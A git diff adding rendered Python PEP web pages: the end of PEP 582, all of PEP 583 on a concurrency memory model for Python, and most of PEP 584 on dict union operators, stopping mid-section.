+
+
+
+

Reference Implementation

+

Here is a small script which will +enable the implementation for Cpython & in PyPy.

+
+
+

Rejected Ideas

+
    +
  • Alternative names, such as __pylocal__ and python_modules. Ultimately, the name is arbitrary and the chosen name is good enough.
  • +
  • Additional features of virtual environments. This proposal is not a replacement for virtual environments, and such features are therefore out of scope.
  • +
  • We will not scan any parent directory to find __pypackages__. If we want to execute scripts inside of the ~/bin/ directory, then the __pypackages__ directory must be inside of the ~/bin/ directory. Doing any such scan for __pypackages__ (for the interpreter or a script) will have security implications and also increase startup time.
  • +
  • Raise an error if unexpected files or directories are present in __pypackages__. This is considered too strict, particularly as transitional approaches like pip install --prefix can create additional files in __pypackages__.
  • +
  • Using a different sysconfig scheme, or a dedicated pypackages scheme. While this is attractive in theory, it makes transition harder, as there will be no readily-available way of installing to __pypackages__ until tools implement explicit support. And while the PEP authors hope and assume that such support would be added, having the proposal dependent on such support in order to be usable seems like an unacceptable risk.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0582.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0583/index.html b/pep-0583/index.html new file mode 100644 index 00000000000..1331f26cadc --- /dev/null +++ b/pep-0583/index.html @@ -0,0 +1,1087 @@ + + + + + + + + PEP 583 – A Concurrency Memory Model for Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 583 – A Concurrency Memory Model for Python

+
+
Author:
+
Jeffrey Yasskin <jyasskin at google.com>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
22-Mar-2008
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes how Python programs may behave in the presence of +concurrent reads and writes to shared variables from multiple threads. +We use a happens before relation to define when variable accesses +are ordered or concurrent. Nearly all programs should simply use locks +to guard their shared variables, and this PEP highlights some of the +strange things that can happen when they don’t, but programmers often +assume that it’s ok to do “simple” things without locking, and it’s +somewhat unpythonic to let the language surprise them. Unfortunately, +avoiding surprise often conflicts with making Python run quickly, so +this PEP tries to find a good tradeoff between the two.

+
+
+

Rationale

+

So far, we have 4 major Python implementations – CPython, Jython, +IronPython, and PyPy – as well as lots of minor ones. Some of +these already run on platforms that do aggressive optimizations. In +general, these optimizations are invisible within a single thread of +execution, but they can be visible to other threads executing +concurrently. CPython currently uses a GIL to ensure that other +threads see the results they expect, but this limits it to a single +processor. Jython and IronPython run on Java’s or .NET’s threading +system respectively, which allows them to take advantage of more cores +but can also show surprising values to other threads.

+

So that threaded Python programs continue to be portable between +implementations, implementers and library authors need to agree on +some ground rules.

+
+
+

A couple definitions

+
+
Variable
A name that refers to an object. Variables are generally +introduced by assigning to them, and may be destroyed by passing +them to del. Variables are fundamentally mutable, while +objects may not be. There are several varieties of variables: +module variables (often called “globals” when accessed from within +the module), class variables, instance variables (also known as +fields), and local variables. All of these can be shared between +threads (the local variables if they’re saved into a closure). +The object in which the variables are scoped notionally has a +dict whose keys are the variables’ names.
+
Object
A collection of instance variables (a.k.a. fields) and methods. +At least, that’ll do for this PEP.
+
Program Order
The order that actions (reads and writes) happen within a thread, +which is very similar to the order they appear in the text.
+
Conflicting actions
Two actions on the same variable, at least one of which is a write.
+
Data race
A situation in which two conflicting actions happen at the same +time. “The same time” is defined by the memory model.
+
+
+
+

Two simple memory models

+

Before talking about the details of data races and the surprising +behaviors they produce, I’ll present two simple memory models. The +first is probably too strong for Python, and the second is probably +too weak.

+
+

Sequential Consistency

+

In a sequentially-consistent concurrent execution, actions appear to +happen in a global total order with each read of a particular variable +seeing the value written by the last write that affected that +variable. The total order for actions must be consistent with the +program order. A program has a data race on a given input when one of +its sequentially consistent executions puts two conflicting actions +next to each other.

+

This is the easiest memory model for humans to understand, although it +doesn’t eliminate all confusion, since operations can be split in odd +places.

+
+
+

Happens-before consistency

+

The program contains a collection of synchronization actions, which +in Python currently include lock acquires and releases and thread +starts and joins. Synchronization actions happen in a global total +order that is consistent with the program order (they don’t have to +happen in a total order, but it simplifies the description of the +model). A lock release synchronizes with all later acquires of the +same lock. Similarly, given t = threading.Thread(target=worker):

+
    +
  • A call to t.start() synchronizes with the first statement in +worker().
  • +
  • The return from worker() synchronizes with the return from +t.join().
  • +
  • If the return from t.start() happens before (see below) a call +to t.isAlive() that returns False, the return from +worker() synchronizes with that call.
  • +
+

We call the source of the synchronizes-with edge a release operation +on the relevant variable, and we call the target an acquire operation.

+

The happens before order is the transitive closure of the program +order with the synchronizes-with edges. That is, action A happens +before action B if:

+
    +
  • A falls before B in the program order (which means they run in the +same thread)
  • +
  • A synchronizes with B
  • +
  • You can get to B by following happens-before edges from A.
  • +
+

An execution of a program is happens-before consistent if each read +R sees the value of a write W to the same variable such that:

+
    +
  • R does not happen before W, and
  • +
  • There is no other write V that overwrote W before R got a +chance to see it. (That is, it can’t be the case that W happens +before V happens before R.)
  • +
+

You have a data race if two conflicting actions aren’t related by +happens-before.

+
+

An example

+

Let’s use the rules from the happens-before model to prove that the +following program prints “[7]”:

+
class Queue:
+    def __init__(self):
+        self.l = []
+        self.cond = threading.Condition()
+
+    def get():
+        with self.cond:
+            while not self.l:
+                self.cond.wait()
+            ret = self.l[0]
+            self.l = self.l[1:]
+            return ret
+
+    def put(x):
+        with self.cond:
+            self.l.append(x)
+            self.cond.notify()
+
+myqueue = Queue()
+
+def worker1():
+    x = [7]
+    myqueue.put(x)
+
+def worker2():
+    y = myqueue.get()
+    print y
+
+thread1 = threading.Thread(target=worker1)
+thread2 = threading.Thread(target=worker2)
+thread2.start()
+thread1.start()
+
+
+
    +
  1. Because myqueue is initialized in the main thread before +thread1 or thread2 is started, that initialization happens +before worker1 and worker2 begin running, so there’s no way +for either to raise a NameError, and both myqueue.l and +myqueue.cond are set to their final objects.
  2. +
  3. The initialization of x in worker1 happens before it calls +myqueue.put(), which happens before it calls +myqueue.l.append(x), which happens before the call to +myqueue.cond.release(), all because they run in the same +thread.
  4. +
  5. In worker2, myqueue.cond will be released and re-acquired +until myqueue.l contains a value (x). The call to +myqueue.cond.release() in worker1 happens before that last +call to myqueue.cond.acquire() in worker2.
  6. +
  7. That last call to myqueue.cond.acquire() happens before +myqueue.get() reads myqueue.l, which happens before +myqueue.get() returns, which happens before print y, again +all because they run in the same thread.
  8. +
  9. Because happens-before is transitive, the list initially stored in +x in thread1 is initialized before it is printed in thread2.
  10. +
+

Usually, we wouldn’t need to look all the way into a thread-safe +queue’s implementation in order to prove that uses were safe. Its +interface would specify that puts happen before gets, and we’d reason +directly from that.

+
+
+
+
+

Surprising behaviors with races

+

Lots of strange things can happen when code has data races. It’s easy +to avoid all of these problems by just protecting shared variables +with locks. This is not a complete list of race hazards; it’s just a +collection that seem relevant to Python.

+

In all of these examples, variables starting with r are local +variables, and other variables are shared between threads.

+
+

Zombie values

+

This example comes from the Java memory model:

+
+
Initially p is q and p.x == 0. + + + + + + + + + + + + + + + + + + + + + + +
Thread 1Thread 2
r1 = pr6 = p
r2 = r1.xr6.x = 3
r3 = q
r4 = r3.x
r5 = r1.x
+

Can produce r2 == r5 == 0 but r4 == 3, proving that +p.x went from 0 to 3 and back to 0.

+
+

A good compiler would like to optimize out the redundant load of +p.x in initializing r5 by just re-using the value already +loaded into r2. We get the strange result if thread 1 sees memory +in this order:

+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
EvaluationComputesWhy
r1 = p
r2 = r1.xr2 == 0
r3 = qr3 is p
p.x = 3Side-effect of thread 2
r4 = r3.xr4 == 3
r5 = r2r5 == 0Optimized from r5 = r1.x because r2 == r1.x.
+
+
+
+

Inconsistent Orderings

+

From N2177: Sequential Consistency for Atomics, and also known as +Independent Read of Independent Write (IRIW).

+
+
Initially, a == b == 0. + + + + + + + + + + + + + + + + + + + +
Thread 1Thread 2Thread 3Thread 4
r1 = ar3 = ba = 1b = 1
r2 = br4 = a
+

We may get r1 == r3 == 1 and r2 == r4 == 0, proving both +that a was written before b (thread 1’s data), and that +b was written before a (thread 2’s data). See Special +Relativity for a +real-world example.

+
+

This can happen if thread 1 and thread 3 are running on processors +that are close to each other, but far away from the processors that +threads 2 and 4 are running on and the writes are not being +transmitted all the way across the machine before becoming visible to +nearby threads.

+

Neither acquire/release semantics nor explicit memory barriers can +help with this. Making the orders consistent without locking requires +detailed knowledge of the architecture’s memory model, but Java +requires it for volatiles so we could use documentation aimed at its +implementers.

+
+
+

A happens-before race that’s not a sequentially-consistent race

+

From the POPL paper about the Java memory model [#JMM-popl].

+
+
Initially, x == y == 0. + + + + + + + + + + + + + + + + +
Thread 1Thread 2
r1 = xr2 = y
if r1 != 0:if r2 != 0:
y = 42x = 42
+

Can r1 == r2 == 42???

+
+

In a sequentially-consistent execution, there’s no way to get an +adjacent read and write to the same variable, so the program should be +considered correctly synchronized (albeit fragile), and should only +produce r1 == r2 == 0. However, the following execution is +happens-before consistent:

+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
StatementValueThread
r1 = x421
if r1 != 0:true1
y = 421
r2 = y422
if r2 != 0:true2
x = 422
+
+

WTF, you are asking yourself. Because there were no inter-thread +happens-before edges in the original program, the read of x in thread +1 can see any of the writes from thread 2, even if they only happened +because the read saw them. There are data races in the +happens-before model.

+

We don’t want to allow this, so the happens-before model isn’t enough +for Python. One rule we could add to happens-before that would +prevent this execution is:

+
+
If there are no data races in any sequentially-consistent +execution of a program, the program should have sequentially +consistent semantics.
+

Java gets this rule as a theorem, but Python may not want all of the +machinery you need to prove it.

+
+
+

Self-justifying values

+

Also from the POPL paper about the Java memory model [#JMM-popl].

+
+
Initially, x == y == 0. + + + + + + + + + + + + + +
Thread 1Thread 2
r1 = xr2 = y
y = r1x = r2
+

Can x == y == 42???

+
+

In a sequentially consistent execution, no. In a happens-before +consistent execution, yes: The read of x in thread 1 is allowed to see +the value written in thread 2 because there are no happens-before +relations between the threads. This could happen if the compiler or +processor transforms the code into:

+
+
+ + + + + + + + + + + + + + + + + + + +
Thread 1Thread 2
y = 42r2 = y
r1 = xx = r2
if r1 != 42:
y = r1
+
+

It can produce a security hole if the speculated value is a secret +object, or points to the memory that an object used to occupy. Java +cares a lot about such security holes, but Python may not.

+
+
+

Uninitialized values (direct)

+

From several classic double-checked locking examples.

+
+
Initially, d == None. + + + + + + + + + + + + + +
Thread 1Thread 2
while not d: passd = [3, 4]
assert d[1] == 4
+

This could raise an IndexError, fail the assertion, or, without +some care in the implementation, cause a crash or other undefined +behavior.

+
+

Thread 2 may actually be implemented as:

+
r1 = list()
+r1.append(3)
+r1.append(4)
+d = r1
+
+
+

Because the assignment to d and the item assignments are independent, +the compiler and processor may optimize that to:

+
r1 = list()
+d = r1
+r1.append(3)
+r1.append(4)
+
+
+

Which is obviously incorrect and explains the IndexError. If we then +look deeper into the implementation of r1.append(3), we may find +that it and d[1] cannot run concurrently without causing their own +race conditions. In CPython (without the GIL), those race conditions +would produce undefined behavior.

+

There’s also a subtle issue on the reading side that can cause the +value of d[1] to be out of date. Somewhere in the implementation of +list, it stores its contents as an array in memory. This array may +happen to be in thread 1’s cache. If thread 1’s processor reloads +d from main memory without reloading the memory that ought to +contain the values 3 and 4, it could see stale values instead. As far +as I know, this can only actually happen on Alphas and maybe Itaniums, +and we probably have to prevent it anyway to avoid crashes.

+
+
+

Uninitialized values (flag)

+

From several more double-checked locking examples.

+
+
Initially, d == dict() and initialized == False. + + + + + + + + + + + + + + + + + + + +
Thread 1Thread 2
while not initialized: passd[‘a’] = 3
r1 = d[‘a’]initialized = True
r2 = r1 == 3
assert r2
+

This could raise a KeyError, fail the assertion, or, without some +care in the implementation, cause a crash or other undefined +behavior.

+
+

Because d and initialized are independent (except in the +programmer’s mind), the compiler and processor can rearrange these +almost arbitrarily, except that thread 1’s assertion has to stay after +the loop.

+
+
+

Inconsistent guarantees from relying on data dependencies

+

This is a problem with Java final variables and the proposed +data-dependency ordering in C++0x.

+
+
First execute:
g = []
+def Init():
+    g.extend([1,2,3])
+    return [1,2,3]
+h = None
+
+
+

Then in two threads:

+ + + + + + + + + + + + + + + + + +
Thread 1Thread 2
while not h: passr1 = Init()
assert h == [1,2,3]freeze(r1)
assert h == gh = r1
+

If h has semantics similar to a Java final variable (except +for being write-once), then even though the first assertion is +guaranteed to succeed, the second could fail.

+
+

Data-dependent guarantees like those final provides only work if +the access is through the final variable. It’s not even safe to +access the same object through a different route. Unfortunately, +because of how processors work, final’s guarantees are only cheap when +they’re weak.

+
+
+
+

The rules for Python

+

The first rule is that Python interpreters can’t crash due to race +conditions in user code. For CPython, this means that race conditions +can’t make it down into C. For Jython, it means that +NullPointerExceptions can’t escape the interpreter.

+

Presumably we also want a model at least as strong as happens-before +consistency because it lets us write a simple description of how +concurrent queues and thread launching and joining work.

+

Other rules are more debatable, so I’ll present each one with pros and +cons.

+
+

Data-race-free programs are sequentially consistent

+

We’d like programmers to be able to reason about their programs as if +they were sequentially consistent. Since it’s hard to tell whether +you’ve written a happens-before race, we only want to require +programmers to prevent sequential races. The Java model does this +through a complicated definition of causality, but if we don’t want to +include that, we can just assert this property directly.

+
+
+

No security holes from out-of-thin-air reads

+

If the program produces a self-justifying value, it could expose +access to an object that the user would rather the program not see. +Again, Java’s model handles this with the causality definition. We +might be able to prevent these security problems by banning +speculative writes to shared variables, but I don’t have a proof of +that, and Python may not need those security guarantees anyway.

+
+
+

Restrict reorderings instead of defining happens-before

+

The .NET [#CLR-msdn] and x86 [#x86-model] memory models are based on +defining which reorderings compilers may allow. I think that it’s +easier to program to a happens-before model than to reason about all +of the possible reorderings of a program, and it’s easier to insert +enough happens-before edges to make a program correct, than to insert +enough memory fences to do the same thing. So, although we could +layer some reordering restrictions on top of the happens-before base, +I don’t think Python’s memory model should be entirely reordering +restrictions.

+
+
+

Atomic, unordered assignments

+

Assignments of primitive types are already atomic. If you assign +3<<72 + 5 to a variable, no thread can see only part of the value. +Jeremy Manson suggested that we extend this to all objects. This +allows compilers to reorder operations to optimize them, without +allowing some of the more confusing uninitialized values. The +basic idea here is that when you assign a shared variable, readers +can’t see any changes made to the new value before the assignment, or +to the old value after the assignment. So, if we have a program like:

+
+
Initially, (d.a, d.b) == (1, 2), and (e.c, e.d) == (3, 4). +We also have class Obj(object): pass. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Thread 1Thread 2
r1 = Obj()r3 = d
r1.a = 3r4, r5 = r3.a, r3.b
r1.b = 4r6 = e
d = r1r7, r8 = r6.c, r6.d
r2 = Obj()
r2.c = 6
r2.d = 7
e = r2
+

(r4, r5) can be (1, 2) or (3, 4) but nothing else, and +(r7, r8) can be either (3, 4) or (6, 7) but nothing +else. Unlike if writes were releases and reads were acquires, +it’s legal for thread 2 to see (e.c, e.d) == (6, 7) and (d.a, +d.b) == (1, 2) (out of order).

+
+

This allows the compiler a lot of flexibility to optimize without +allowing users to see some strange values. However, because it relies +on data dependencies, it introduces some surprises of its own. For +example, the compiler could freely optimize the above example to:

+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Thread 1Thread 2
r1 = Obj()r3 = d
r2 = Obj()r6 = e
r1.a = 3r4, r7 = r3.a, r6.c
r2.c = 6r5, r8 = r3.b, r6.d
r2.d = 7
e = r2
r1.b = 4
d = r1
+
+

As long as it didn’t let the initialization of e move above any of +the initializations of members of r2, and similarly for d and +r1.

+

This also helps to ground happens-before consistency. To see the +problem, imagine that the user unsafely publishes a reference to an +object as soon as she gets it. The model needs to constrain what +values can be read through that reference. Java says that every field +is initialized to 0 before anyone sees the object for the first time, +but Python would have trouble defining “every field”. If instead we +say that assignments to shared variables have to see a value at least +as up to date as when the assignment happened, then we don’t run into +any trouble with early publication.

+
+
+

Two tiers of guarantees

+

Most other languages with any guarantees for unlocked variables +distinguish between ordinary variables and volatile/atomic variables. +They provide many more guarantees for the volatile ones. Python can’t +easily do this because we don’t declare variables. This may or may +not matter, since python locks aren’t significantly more expensive +than ordinary python code. If we want to get those tiers back, we could:

+
    +
  1. Introduce a set of atomic types similar to Java’s [5] +or C++’s [6]. Unfortunately, we couldn’t assign to +them with =.
  2. +
  3. Without requiring variable declarations, we could also specify that +all of the fields on a given object are atomic.
  4. +
  5. Extend the __slots__ mechanism [7] with a parallel +__volatiles__ list, and maybe a __finals__ list.
  6. +
+
+
+

Sequential Consistency

+

We could just adopt sequential consistency for Python. +This avoids all of the hazards mentioned above, +but it prohibits lots of optimizations too. +As far as I know, this is the current model of CPython, +but if CPython learned to optimize out some variable reads, +it would lose this property.

+

If we adopt this, Jython’s dict implementation may no longer be +able to use ConcurrentHashMap because that only promises to create +appropriate happens-before edges, not to be sequentially consistent +(although maybe the fact that Java volatiles are totally ordered +carries over). Both Jython and IronPython would probably need to use +AtomicReferenceArray +or the equivalent for any __slots__ arrays.

+
+
+

Adapt the x86 model

+

The x86 model is:

+
    +
  1. Loads are not reordered with other loads.
  2. +
  3. Stores are not reordered with other stores.
  4. +
  5. Stores are not reordered with older loads.
  6. +
  7. Loads may be reordered with older stores to different locations but +not with older stores to the same location.
  8. +
  9. In a multiprocessor system, memory ordering obeys causality (memory +ordering respects transitive visibility).
  10. +
  11. In a multiprocessor system, stores to the same location have a +total order.
  12. +
  13. In a multiprocessor system, locked instructions have a total order.
  14. +
  15. Loads and stores are not reordered with locked instructions.
  16. +
+

In acquire/release terminology, this appears to say that every store +is a release and every load is an acquire. This is slightly weaker +than sequential consistency, in that it allows inconsistent +orderings, but it disallows zombie values and the compiler +optimizations that produce them. We would probably want to weaken the +model somehow to explicitly allow compilers to eliminate redundant +variable reads. The x86 model may also be expensive to implement on +other platforms, although because x86 is so common, that may not +matter much.

+
+
+

Upgrading or downgrading to an alternate model

+

We can adopt an initial memory model without totally restricting +future implementations. If we start with a weak model and want to get +stronger later, we would only have to change the implementations, not +programs. Individual implementations could also guarantee a stronger +memory model than the language demands, although that could hurt +interoperability. On the other hand, if we start with a strong model +and want to weaken it later, we can add a from __future__ import +weak_memory statement to declare that some modules are safe.

+
+
+
+

Implementation Details

+

The required model is weaker than any particular implementation. This +section tries to document the actual guarantees each implementation +provides, and should be updated as the implementations change.

+
+

CPython

+

Uses the GIL to guarantee that other threads don’t see funny +reorderings, and does few enough optimizations that I believe it’s +actually sequentially consistent at the bytecode level. Threads can +switch between any two bytecodes (instead of only between statements), +so two threads that concurrently execute:

+
i = i + 1
+
+
+

with i initially 0 could easily end up with i==1 instead +of the expected i==2. If they execute:

+
i += 1
+
+
+

instead, CPython 2.6 will always give the right answer, but it’s easy +to imagine another implementation in which this statement won’t be +atomic.

+
+
+

PyPy

+

Also uses a GIL, but probably does enough optimization to violate +sequential consistency. I know very little about this implementation.

+
+
+

Jython

+

Provides true concurrency under the Java memory model and stores +all object fields (except for those in __slots__?) in a +ConcurrentHashMap, +which provides fairly strong ordering guarantees. Local variables in +a function may have fewer guarantees, which would become visible if +they were captured into a closure that was then passed to another +thread.

+
+
+

IronPython

+

Provides true concurrency under the CLR memory model, which probably +protects it from uninitialized values. IronPython uses a locked +map to store object fields, providing at least as many guarantees as +Jython.

+
+
+
+

References

+ +
+
+

Acknowledgements

+

Thanks to Jeremy Manson and Alex Martelli for detailed discussions on +what this PEP should look like.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0583.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0584/index.html b/pep-0584/index.html new file mode 100644 index 00000000000..d317509f491 --- /dev/null +++ b/pep-0584/index.html @@ -0,0 +1,1169 @@ + + + + + + + + PEP 584 – Add Union Operators To dict | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 584 – Add Union Operators To dict

+
+
Author:
+
Steven D’Aprano <steve at pearwood.info>, +Brandt Bucher <brandt at python.org>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Mar-2019
+
Python-Version:
+
3.9
+
Post-History:
+
01-Mar-2019, 16-Oct-2019, 02-Dec-2019, 04-Feb-2020, +17-Feb-2020
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding merge (|) and update (|=) operators +to the built-in dict class.

+
+

Note

+

After this PEP was accepted, the decision was made to also +implement the new operators for several other standard library +mappings.

+
+
+
+

Motivation

+

The current ways to merge two dicts have several disadvantages:

+
+

dict.update

+

d1.update(d2) modifies d1 in-place. +e = d1.copy(); e.update(d2) is not an expression and needs a +temporary variable.

+
+
+

{**d1, **d2}

+

Dict unpacking looks ugly and is not easily discoverable. Few people +would be able to guess what it means the first time they see it, or +think of it as the “obvious way” to merge two dicts.

+

As Guido said:

+
+
I’m sorry for PEP 448, but even if you know about **d in +simpler contexts, if you were to ask a typical Python user how +to combine two dicts into a new one, I doubt many people would +think of {**d1, **d2}. I know I myself had forgotten about +it when this thread started!
+

{**d1, **d2} ignores the types of the mappings and always returns +a dict. type(d1)({**d1, **d2}) fails for dict subclasses +such as defaultdict that have an incompatible __init__ method.

+
+
+

collections.ChainMap

+

ChainMap is unfortunately poorly-known and doesn’t qualify as +“obvious”. It also resolves duplicate keys in the opposite order to +that expected (“first seen wins” instead of “last seen wins”). Like +dict unpacking, it is tricky to get it to honor the desired subclass. +For the same reason, type(d1)(ChainMap(d2, d1)) fails for some +subclasses of dict.

+

Further, ChainMaps wrap their underlying dicts, so writes to the +ChainMap will modify the original dict:

+
>>> d1 = {'spam': 1}
+>>> d2 = {'eggs': 2}
+>>> merged = ChainMap(d2, d1)
+>>> merged['eggs'] = 999
+>>> d2
+{'eggs': 999}
+
+
+
+
+

dict(d1, **d2)

+

This “neat trick” is not well-known, and only works when d2 is +entirely string-keyed:

+
>>> d1 = {"spam": 1}
+>>> d2 = {3665: 2}
+>>> dict(d1, **d2)
+Traceback (most recent call last):
+  ...
+TypeError: keywords must be strings
+
+
+
+
+
+

Rationale

+

The new operators will have the same relationship to the +dict.update method as the list concatenate (+) and extend +(+=) operators have to list.extend. Note that this is +somewhat different from the relationship that |/|= have with +set.update; the authors have determined that allowing the in-place +operator to accept a wider range of types (as list does) is a more +useful design, and that restricting the types of the binary operator’s +operands (again, as list does) will help avoid silent errors +caused by complicated implicit type casting on both sides.

+

Key conflicts will be resolved by keeping the rightmost value. This +matches the existing behavior of similar dict operations, where +the last seen value always wins:

+
{'a': 1, 'a': 2}
+{**d, **e}
+d.update(e)
+d[k] = v
+{k: v for x in (d, e) for (k, v) in x.items()}
+
+
+

All of the above follow the same rule. This PEP takes the position +that this behavior is simple, obvious, usually the behavior we want, +and should be the default behavior for dicts. This means that dict +union is not commutative; in general d | e != e | d.

+

Similarly, the iteration order of the key-value pairs in the +dictionary will follow the same semantics as the examples above, with +each newly added key (and its value) being appended to the current +sequence.

+
+
+

Specification

+

Dict union will return a new dict consisting of the left operand +merged with the right operand, each of which must be a dict (or an +instance of a dict subclass). If a key appears in both operands, +the last-seen value (i.e. that from the right-hand operand) wins:

+
>>> d = {'spam': 1, 'eggs': 2, 'cheese': 3}
+>>> e = {'cheese': 'cheddar', 'aardvark': 'Ethel'}
+>>> d | e
+{'spam': 1, 'eggs': 2, 'cheese': 'cheddar', 'aardvark': 'Ethel'}
+>>> e | d
+{'cheese': 3, 'aardvark': 'Ethel', 'spam': 1, 'eggs': 2}
+
+
+

The augmented assignment version operates in-place:

+
>>> d |= e
+>>> d
+{'spam': 1, 'eggs': 2, 'cheese': 'cheddar', 'aardvark': 'Ethel'}
+
+
+

Augmented assignment behaves identically to the update method +called with a single positional argument, so it also accepts anything +implementing the Mapping protocol (more specifically, anything with +the keys and __getitem__ methods) or iterables of key-value +pairs. This is analogous to list += and list.extend, which +accept any iterable, not just lists. Continued from above:

+
>>> d | [('spam', 999)]
+Traceback (most recent call last):
+  ...
+TypeError: can only merge dict (not "list") to dict
+
+>>> d |= [('spam', 999)]
+>>> d
+{'spam': 999, 'eggs': 2, 'cheese': 'cheddar', 'aardvark': 'Ethel'}
+
+
+

When new keys are added, their order matches their order within the +right-hand mapping, if any exists for its type.

+
+
+

Reference Implementation

+

One of the authors has written a C implementation.

+

An approximate pure-Python implementation is:

+
def __or__(self, other):
+    if not isinstance(other, dict):
+        return NotImplemented
+    new = dict(self)
+    new.update(other)
+    return new
+
+def __ror__(self, other):
+    if not isinstance(other, dict):
+        return NotImplemented
+    new = dict(other)
+    new.update(self)
+    return new
+
+def __ior__(self, other):
+    dict.update(self, other)
+    return self
+
+
+
+
+

Major Objections

+
+

Dict Union Is Not Commutative

+

Union is commutative, but dict union will not be (d | e != e | d).

+
+

Response

+

There is precedent for non-commutative unions in Python:

+
>>> {0} | {False}
+{0}
+>>> {False} | {0}
+{False}
+
+
+

While the results may be equal, they are distinctly different. In +general, a | b is not the same operation as b | a.

+
+
+
+

Dict Union Will Be Inefficient

+

Giving a pipe operator to mappings is an invitation to writing code +that doesn’t scale well. Repeated dict union is inefficient: +d | e | f | g | h creates and destroys three temporary mappings.

+
+

Response

+

The same argument applies to sequence concatenation.

+

Sequence concatenation grows with the total number of items in the +sequences, leading to O(N**2) (quadratic) performance. Dict union is +likely to involve duplicate keys, so the temporary mappings will +not grow as fast.

+

Just as it is rare for people to concatenate large numbers of lists or +tuples, the authors of this PEP believe that it will be rare for +people to merge large numbers of dicts. collections.Counter is a +dict subclass that supports many operators, and there are no known +examples of people having performance issues due to combining large +numbers of Counters. Further, a survey of the standard library by the +authors found no examples of merging more than two dicts, so this is +unlikely to be a performance problem in practice… “Everything is +fast for small enough N”.

+

If one expects to be merging a large number of dicts where performance +is an issue, it may be better to use an explicit loop and in-place +merging:

+
new = {}
+for d in many_dicts:
+    new |= d
+
+
+
+
+
+

Dict Union Is Lossy

+

Dict union can lose data (values may disappear); no other form of +union is lossy.

+
+

Response

+

It isn’t clear why the first part of this argument is a problem. +dict.update() may throw away values, but not keys; that is +expected behavior, and will remain expected behavior regardless of +whether it is spelled as update() or |.

+

Other types of union are also lossy, in the sense of not being +reversible; you cannot get back the two operands given only the union. +a | b == 365… what are a and b?

+
+
+
+

Only One Way To Do It

+

Dict union will violate the Only One Way koan from the Zen.

+
+

Response

+

There is no such koan. “Only One Way” is a calumny about Python +originating long ago from the Perl community.

+
+
+
+

More Than One Way To Do It

+

Okay, the Zen doesn’t say that there should be Only One Way To Do It. +But it does have a prohibition against allowing “more than one way to +do it”.

+
+

Response

+

There is no such prohibition. The “Zen of Python” merely expresses a +preference for “only one obvious way”:

+
There should be one-- and preferably only one --obvious way to do
+it.
+
+
+

The emphasis here is that there should be an obvious way to do “it”. +In the case of dict update operations, there are at least two +different operations that we might wish to do:

+
    +
  • Update a dict in place: The Obvious Way is to use the update() +method. If this proposal is accepted, the |= augmented +assignment operator will also work, but that is a side-effect of how +augmented assignments are defined. Which you choose is a matter of +taste.
  • +
  • Merge two existing dicts into a third, new dict: This PEP proposes +that the Obvious Way is to use the | merge operator.
  • +
+

In practice, this preference for “only one way” is frequently violated +in Python. For example, every for loop could be re-written as a +while loop; every if block could be written as an if/ +else block. List, set and dict comprehensions could all be +replaced by generator expressions. Lists offer no fewer than five +ways to implement concatenation:

+
    +
  • Concatenation operator: a + b
  • +
  • In-place concatenation operator: a += b
  • +
  • Slice assignment: a[len(a):] = b
  • +
  • Sequence unpacking: [*a, *b]
  • +
  • Extend method: a.extend(b)
  • +
+

We should not be too strict about rejecting useful functionality +because it violates “only one way”.

+
+
+
+

Dict Union Makes Code Harder To Understand

+

Dict union makes it harder to tell what code means. To paraphrase the +objection rather than quote anyone in specific: “If I see +spam | eggs, I can’t tell what it does unless I know what spam +and eggs are”.

+
+

Response

+

This is very true. But it is equally true today, where the use of the +| operator could mean any of:

+
    +
  • int/bool bitwise-or
  • +
  • set/frozenset union
  • +
  • any other overloaded operation
  • +
+

Adding dict union to the set of possibilities doesn’t seem to make +it harder to understand the code. No more work is required to +determine that spam and eggs are mappings than it would take +to determine that they are sets, or integers. And good naming +conventions will help:

+
flags |= WRITEABLE  # Probably numeric bitwise-or.
+DO_NOT_RUN = WEEKENDS | HOLIDAYS  # Probably set union.
+settings = DEFAULT_SETTINGS | user_settings | workspace_settings  # Probably dict union.
+
+
+
+
+
+

What About The Full set API?

+

dicts are “set like”, and should support the full collection of set +operators: |, &, ^, and -.

+
+

Response

+

This PEP does not take a position on whether dicts should support the +full collection of set operators, and would prefer to leave that for a +later PEP (one of the authors is interested in drafting such a PEP). +For the benefit of any later PEP, a brief summary follows.

+

Set symmetric difference (^) is obvious and natural. For example, +given two dicts:

+
d1 = {"spam": 1, "eggs": 2}
+d2 = {"ham": 3, "eggs": 4}
+
+
+

the symmetric difference d1 ^ d2 would be +{"spam": 1, "ham": 3}.

+

Set difference (-) is also obvious and natural, and an earlier +version of this PEP included it in the proposal. Given the dicts +above, we would have d1 - d2 be {"spam": 1} and d2 - d1 be +{"ham": 3}.

+

Set intersection (&) is a bit more problematic. While it is easy +to determine the intersection of keys in two dicts, it is not clear +what to do with the values. Given the two dicts above, it is +obvious that the only key of d1 & d2 must be "eggs". “Last +seen wins”, however, has the advantage of consistency with other dict +operations (and the proposed union operators).

+
+
+
+

What About Mapping And MutableMapping?

+

collections.abc.Mapping and collections.abc.MutableMapping +should define | and |=, so subclasses could just inherit the +new operators instead of having to define them.

+
+

Response

+

